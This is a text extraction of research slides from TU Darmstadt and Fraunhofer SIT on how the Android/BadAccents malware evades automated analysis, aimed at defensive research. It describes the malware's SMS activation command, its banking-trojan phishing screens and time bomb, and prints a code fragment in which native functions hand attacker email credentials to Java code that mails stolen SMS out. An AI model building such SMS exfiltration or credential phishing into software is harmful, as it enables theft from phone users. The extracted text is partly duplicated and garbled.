How Current Android Malware Seeks to Evade Automated Code Analysis Siegfried Rasthofer, Irfan Asrar , Stephan Huber, Eric Bodden Technische Universität Darmstadt, Darmstadt, Germany Fraunhofer SIT, Darmstadt, Germany Appthority, San Francisco, USA SECURE SOFTWARE ENGINEERING GROUP
SECURE 2 SOFTWARE ENGINEERING GROUP
Intent-Fuzzing (Behavior Analysis) DroidFuzzer[MoMM’13], IntentFuzzer [WODA’14], Andrubis [BADGERS’14] Inspection of the Symbolic/Concolic Emulator - Network Sniffing Execution - SMS interception Acteve[FSE’12], Rozzle [Oakland’12] - … Dataflow Analysis APP FlowDroid [PLDI’14], Security Report TaintDroid [OSDI’10] Machine Learning CHABADA [ICSE’14], Mudflow [ICSE’15] … SECURE 3 SOFTWARE ENGINEERING GROUP
Is this sufficient enough? SECURE 4 SOFTWARE ENGINEERING GROUP
Is this sufficient enough? SECURE 4 SOFTWARE ENGINEERING GROUP
Android/BadAccents infected >20,000 user SECURE 5 SOFTWARE ENGINEERING GROUP
1. 2. Malware Code-analysis Components Challenges SECURE 6 SOFTWARE ENGINEERING GROUP
SMS E-Mail Tapjacking Activation (Un-)Install Attack Component Fake AV User User User SMS Call Interception Interception Banking Send SMS Trojan HTTP Environment SECURE 7 SOFTWARE ENGINEERING GROUP
Send SMS HTTP Environment Contacts File System 1. Contact’s phone number > 5 digits 2. Contact’s phone number stored into File 3. SMS text sent via C&C server (Internet connection necessary) SECURE 8 SOFTWARE ENGINEERING GROUP
SMS • Checks for incoming number Activation Component +84… or +82… • Receives SMS Call Interception Interception commands from the C&C server Environment File System SECURE 9 SOFTWARE ENGINEERING GROUP
• SMS activation SMS command: ak40_1 (deactivation ak40_0) Activation • Reads E-Mail Component credentials from native code SMS Call Interception Interception • Steals incoming SMS User User User via E-Mail and HTTP Environment File System Native E-Mail HTTP SECURE 10 SOFTWARE ENGINEERING GROUP
((…( Java ((user(=(stringUser();( E-Mail ((pw(=(stringPassword();(( ((saveToFile("musername",(user);(( ((saveToFile("mpass",(pw);(( SMS ((…( Interception ((sendIncomingSMSViaMail((readFromFile("musername"),(((( ((((((((((((((((((((((((((readFromFile("mpass")); Environment Native Native jstring(Java_stringUser()({( File System ((return("attacker@malicious.com";(( }( jstring(Java_stringPassword()({( ((return("superSecurePW";(( } SECURE 11 SOFTWARE ENGINEERING GROUP
Banking Trojan E-Mail User User User Environment File System Time Bomb HTTP SECURE 12 SOFTWARE ENGINEERING GROUP
Banking Trojan E-Mail User User User Environment File System Time Bomb HTTP Security Alert CANCEL OK SECURE 12 SOFTWARE ENGINEERING GROUP
Banking Trojan E-Mail User User User Environment File System Time Bomb HTTP (previous) (person check) (previous) (security center) (certificate password) (secure mode) (name) (secure mode) (password) (Please enter the security (social security number) card correctly) (ok) (cancel) (account number) (account password) (next) (cancel) (next) (cancel) SECURE 12 SOFTWARE ENGINEERING GROUP
Banking Trojan E-Mail User User User Environment File System Time Bomb HTTP (previous) (person check) (previous) (security center) (certificate password) • Waiting time: 30 minutes (secure mode) (name) (secure mode) (password) (Please enter the security • DER-formated certificates on file system (social security number) card correctly) (ok) (cancel) • Installed korean banking applications (account number) (account password) (next) (cancel) (next) (cancel) SECURE 12 SOFTWARE ENGINEERING GROUP
Code Analysis Challenges RQ1: Can we automatically trigger malicious behavior (dynamically)? RQ2: Can we automatically extract the E-mail credentials (statically)? SECURE 13 SOFTWARE ENGINEERING GROUP
RQ1 - Dynamic-Challenge: Generate Proper External Events • Specific events need to be sent SMS • Ordering of events is important Activation Component • Simple fuzzing approaches not SMS sufficient Interception SECURE 14 SOFTWARE ENGINEERING GROUP
RQ1 - Dynamic-Challenge: Correct Environment Setup For a single App: Environment Specific Apps Specific Files Specific Contacts Timing Bomb … SECURE 15 SOFTWARE ENGINEERING GROUP
RQ2 - Static-Challenge: Inter-Language Dataflows Java Native user(=(stringUser();( jstring(Java_stringUser()({( pw(=(stringPassword();(( ((return("attacker@malicious.com";(( saveToFile("musername",(user);(( }( saveToFile("mpass",(pw);(( …( jstring(Java_stringPassword()({( sendIncomingSMSViaMail((( ((return("superSecurePW";(( (((readFromFile("musername"),(((((((((((((((((((((((( } (((readFromFile("mpass")( ); SECURE 16 SOFTWARE ENGINEERING GROUP
RQ2 - Static-Challenge: Inter-Language Dataflows Java Native user(=(stringUser();( jstring(Java_stringUser()({( pw(=(stringPassword();(( ((return("attacker@malicious.com";(( saveToFile("musername",(user);(( }( saveToFile("mpass",(pw);(( …( jstring(Java_stringPassword()({( sendIncomingSMSViaMail((( ((return("superSecurePW";(( (((readFromFile("musername"),(((((((((((((((((((((((( } (((readFromFile("mpass")( ); SECURE 16 SOFTWARE ENGINEERING GROUP
APP Code Analysis Challenges Siegfried Rasthofer Secure Software Engineering Group (EC-SPRIDE) Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de SECURE 17 SOFTWARE ENGINEERING GROUP
Recommend
More recommend